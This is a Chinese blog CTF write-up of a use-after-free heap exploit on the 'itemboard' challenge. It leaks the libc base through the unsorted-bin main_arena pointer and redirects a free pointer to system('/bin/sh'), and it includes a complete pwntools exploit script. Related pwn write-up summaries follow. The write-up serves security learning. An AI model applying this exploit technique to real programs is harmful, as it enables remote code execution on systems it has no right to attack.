pwn 堆溢出之 泄露基址

最新推荐文章于 2025-06-09 00:03:14 发布
最新推荐文章于 2025-06-09 00:03:14 发布
阅读量3.3k 收藏 9
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41071646/article/details/89522660
本文深入解析UAF(Use After Free)漏洞的利用方法,通过实例演示如何在2.23版本的libc库中找到main_arena基址,进而泄漏Libc的加载地址。详细介绍了如何通过调整堆分配与释放策略,利用UAF特性改写free指针指向system函数,最终实现远程代码执行。

先声明一下本文的参考链接

https://blog.youkuaiyun.com/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg

这篇博客写的非常好  受教了   本来其实我是看的另一道题  但是那道题 感觉并不是很适合我这种萌新  然后我就看到了这道题 就 

由于这个篇文章写的很清楚 而且   代码直接就可以拿到flag  我决定换一个库来实验  就用我的 16.04 的 版本号 

我们先看一下运行库

看的出来是 2.23.so的库 我们把他找出来 

然后 这个题的保护是 

是由pie的  那么 我本来的想法 就失败了  libc的基址 不能够泄露出来 然后 这里 的话    上面的那个博客就写的非常全面 就是  :

而在fastbin为空时,unsortbin的fd和bk指向自身main_arena中,该地址的相对偏移值存放在libc.so中,可以通过use after free后打印出main_arena的实际地址,结合偏移值从而得到libc的加载地址。

上面就是上面链接博客的原话  这个 就是我们求出libc的地址的 原理 我们先调试一下  

申请两个堆 然后释放掉一个堆

    add('aaaa',0x80,'bbbb')
    add('cccc',0x80,'dddd')
    dele(0)

看一下 堆的变化

这里可以看的出来 是 main_arena+88的地址 main_arena的基址存放在libc中的malloc_trim()函数中  那么我们去找一下 2.23so的 malloc_trim()函数

那么 main_arena 的基址就是0x3C4B20 那么我们就可以求出来我们的lib的基址

得到我们lib的基址 就能够获得我们的 system的地址   那么 我们可以利用 堆 优先考虑  最先释放的堆的地址  那么 我们可以 用uaf 的特性 来 将  临时申请的 item的free 指针 指向 system 就可以了

那么这道题 就完美结束了

#!/usr/bin/python2
#coding=utf8
from pwn import *
io=process("./itemboard")
libc=ELF("./libc6_2.23.so")
def add(name,len,context):
	io.recvuntil("choose:")
	io.sendline("1")
	io.recvuntil("Item name?")
	io.sendline(name)
	io.recvuntil("Description's len?")
	io.sendline(str(len))
	io.recvuntil("Description?")
	io.sendline(context)

def show(index):
	io.recvuntil("choose:")
	io.sendline("3")
	io.recvuntil("Which item?")
	io.sendline(str(index))

def dele(index):
	io.recvuntil("choose:")
	io.sendline("4")
	io.recvuntil("Which item?")
	io.sendline(str(index))


if __name__ =='__main__':
	add('aaaa',0x80,'bbbb')
	add('cccc',0x80,'dddd')
	dele(0)
	show(0)
	io.recvuntil("Description:")
	libc_base_addr=u64(io.recv(6).ljust(8,'\x00'))-88-0x3C4B20
	system_addr=libc_base_addr+libc.symbols['system']
	print 'system address: ',hex(system_addr)
	dele(1)

	add('aaaa',0x18,'eeee')

	dele(2)

	add('aaaa',0x18,'/bin/sh;'+'s'*8+p64(system_addr))
	dele(2)

	io.interactive()

在本地成功!

CTFshow-PWN-栈溢出(pwn50)
Welcome To Myon'Blog !
06-10 231
摘要:本文描述了一个64位程序的ROP攻击过程。通过gets函数溢出,利用ret2libc技术,先使用puts函数泄露真实地址,找到gadgets(pop rdi;ret和ret指令)。攻击分两步:首先构造payload泄露puts函数地址,计算libc基址;然后组合system和/bin_sh地址实施攻击,最终成功获取flag(ctfshow{11ba423c-006e-429f-9ebd-9fb219f3611f})。整个过程涉及动态链接库地址计算和ROP链构造技术。
CTFshow-PWN-栈溢出(pwn46)
Welcome To Myon'Blog !
06-09 273
摘要:本文介绍了CTF比赛中一个栈溢出漏洞的利用过程。通过puts函数泄露真实地址,使用ret2libc技术计算偏移,最终获取shell。利用脚本包含两个payload:第一个泄露puts地址并计算libc基址,第二个调用system("/bin/sh")。成功获取flag:ctfshow{d495bd39-34c0-49a5-bbfa-e0468786ccdb}。文中展示了完整的Python PWN工具利用代码。
二进制漏洞挖掘之栈溢出-开启PIE
ylcangel的专栏
10-18 3806
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
Buuctf(pwn) ez_pz_hackover_2016 泄露栈地址,retshellcode;调试计算
半岛铁盒的博客
08-13 1451
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里写入shellcode,执行vuln函数后让dest造成溢出
BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget
半岛铁盒的博客
08-12 752
64位,开了nx保护 运行了一下程序 buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’) 利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址 然后造成溢出,将返回地址覆盖为system(‘/bin/sh’) from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('n
堆技巧 数组反向越界泄露地址
tbsqigongzi的博客
09-02 371
痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题题目给了libc,2.31的题嗯,可以考虑覆盖got表或者hook函数打开ida发现是c++的题,认真分析一下。
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 802
pwn 64位 泄露libc版本
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2524
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
pwn栈溢出 ctf
01-27
### CTF PWN栈溢出攻击技巧与解题方法 #### 栈溢出基础原理 在CTF竞赛中的PWN挑战里,栈溢出是一种常见的漏洞利用方式。当程序未正确验证输入数据长度时,可能导致缓冲区超出其分配空间而覆盖相邻内存区域的数据或...
CTFshow-PWN-栈溢出(pwn47)
最新发布
Welcome To Myon'Blog !
06-09 340
摘要:这是一篇关于32位小端序系统漏洞利用的技术分析文章。作者通过分析存在NX保护的二进制文件,利用gets函数的溢出漏洞和提供的/bin/sh偏移地址,构建了ret2libc攻击。文章详细介绍了如何通过泄露puts函数地址来定位libc基址,最终获取system函数地址完成攻击。攻击脚本使用pwntools工具包实现,重点解决了libc版本选择问题(最终选用libc6-i386_2.27-3ubuntu1_amd64),成功获取了flag。该技术适用于32位栈传参架构,展现了典型的ROP攻击方法。
2017湖湘杯pwn100的题目
11-30
2017湖湘杯pwn100的题目的二进制文件和libc的二进制文件
PWN简单利用堆栈溢出漏洞
weixin_43891422的博客
07-16 1975
PWN简单利用堆栈溢出漏洞PWN简单利用堆栈溢出漏洞0x01 栈的介绍栈是什么栈的特点栈中如何存储数据0x02 函数调用栈寄存器分配0x03 栈帧结构例题:堆栈溢出漏洞利用0x01.运行程序、查看文件类型 和 保护措施0x02.反汇编分析0x03.调试分析payload0x04.payload生成脚本0x05.总结 PWN简单利用堆栈溢出漏洞 0x01 栈的介绍 栈是什么 栈都是一种数据项按序排列的数据结构。 栈的特点 先入先出,先后放入栈中的数据要先取出来。 栈的地址从高处向低处增长,且栈是一块连续区
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 812
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
libc2.26以下的单一堆溢出漏洞利用——0ctf_2017_babyheap
PLpa的博客
08-03 664
前言: 此题为libc2.26以下的libc环境,在libc2.27及以上不一定行得通。 解题思路: 查看保护: 保护全开的64位程序。 观察IDA伪代码: 我们进入IDA看看程序(在此之前建议先运行一遍程序,看看程序的逻辑)。 标准的菜单题,题目先申请了一块堆结构来保存接下来我们要申请的堆地址,在开了保护的情况下,我们并不能很容易的找到这块堆地址在哪,这样我们就很难把堆块劫持到这个上面。 我们看看各个功能: 增 本题采用了calloc来申请堆块,这样对于申请的堆块来说,原有的数据就会被清除掉,这样我
Pwn】05.Linux-User Mode-格式化字符串
weixin_52553215的博客
03-10 1314
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
CTF泄漏libc基址的方法
liucc09的博客
01-05 4403
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
【kernel exploit】CVE-2022-2639 openvswitch模块kmalloc-0x10000堆溢出利用(pipe_buffer任意文件写技术)
panhewu9919的博客
11-24 1703
`openvswitch` 内核模块中,reserve_sfa_size() 函数存在整数溢出导致 **kmalloc-0x10000 堆溢出写**,需要利用页喷射构造 cross-cache 溢出。本文基于 `pipe-primitive` 来篡改任意文件,所以不需要绕过 KASLR/SMEP/SMAP/KPTI 保护机制,跨版本不需要适配就能完成利用。**先创建pipe并splice到只读文件`/usr/bin/mount`,堆喷伪造 `pipe_buffer->flags = PIPE_BUF_FLA
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5718
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值